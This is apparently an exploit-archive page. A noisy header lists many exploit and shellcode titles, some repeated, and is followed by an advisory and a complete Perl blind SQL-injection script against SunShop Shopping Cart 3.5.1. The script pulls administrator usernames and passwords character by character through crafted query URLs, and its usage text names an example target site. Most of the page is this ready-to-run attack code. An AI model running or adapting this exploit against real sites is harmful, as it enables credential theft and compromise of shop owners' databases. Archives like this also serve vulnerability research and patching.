
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
101 lines
No EOL
2.6 KiB
Perl
Executable file
101 lines
No EOL
2.6 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/29241/info
|
|
|
|
SunShop Shopping Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
SunShop Shopping Cart 3.5.1 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/perl -w
|
|
use LWP::UserAgent;
|
|
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
|
|
# scripts site : http://www.turnkeywebtools.com/sunshop/
|
|
# Discovered
|
|
# By : irvian
|
|
# site : http://irvian.cn
|
|
# email : irvian.info@gmail.com
|
|
|
|
print "\r\n[+]-----------------------------------------[+]\r\n";
|
|
print "[+]Blind SQL injection [+]\r\n";
|
|
print "[+]SunShop Version 3.5.1 [+]\r\n";
|
|
print "[+]code by irvian [+]\r\n";
|
|
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
|
|
print "[+]-----------------------------------------[+]\n\r";
|
|
if (@ARGV < 5){
|
|
die "
|
|
|
|
Cara Mengunakan : perl $0 host option id tabel itemid
|
|
|
|
Keterangan
|
|
host : http://victim.com
|
|
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password
|
|
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst
|
|
tabel : Isi Kolom tabel biasanya admin atau ss_admin
|
|
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=
|
|
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10
|
|
\n";}
|
|
|
|
|
|
$url = $ARGV[0];
|
|
$option = $ARGV[1];
|
|
$id = $ARGV[2];
|
|
$tabel = $ARGV[3];
|
|
$itemid = $ARGV[4];
|
|
|
|
if ($option eq 1){
|
|
syswrite(STDOUT, "username: ", 10);}
|
|
elsif ($option eq 2){
|
|
syswrite(STDOUT, "password: ", 10);}
|
|
|
|
for($i = 1; $i <= 32; $i++){
|
|
$f = 0;
|
|
$n = 32;
|
|
while(!$f && $n <= 57)
|
|
{
|
|
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
|
|
$f = 1;
|
|
syswrite(STDOUT, chr($n), 1);
|
|
}
|
|
$n++;
|
|
}
|
|
if ($f==0){
|
|
$n = 97;
|
|
while(!$f && $n <= 122)
|
|
{
|
|
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
|
|
$f = 1;
|
|
syswrite(STDOUT, chr($n), 1);
|
|
}
|
|
$n++;
|
|
}
|
|
}
|
|
}
|
|
print "\n[+]finish Execution Exploit\n";
|
|
|
|
sub blind {
|
|
my $site = $_[0];
|
|
my $op = $_[1];
|
|
my $id = $_[2];
|
|
my $tbl = $_[3];
|
|
my $i = $_[4];
|
|
my $n = $_[5];
|
|
my $item = $_[6];
|
|
|
|
if ($op eq 1){
|
|
$klm = "username";
|
|
}
|
|
elsif ($op eq 2){
|
|
$klm = "password";
|
|
}
|
|
my $ua = LWP::UserAgent->new;
|
|
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
|
|
my $res = $ua->get($url);
|
|
my $browser = $res->content;
|
|
if ($browser !~ /This product is currently not viewable/i){
|
|
return 1;
|
|
}
|
|
else {
|
|
return 0;
|
|
}
|
|
|
|
} |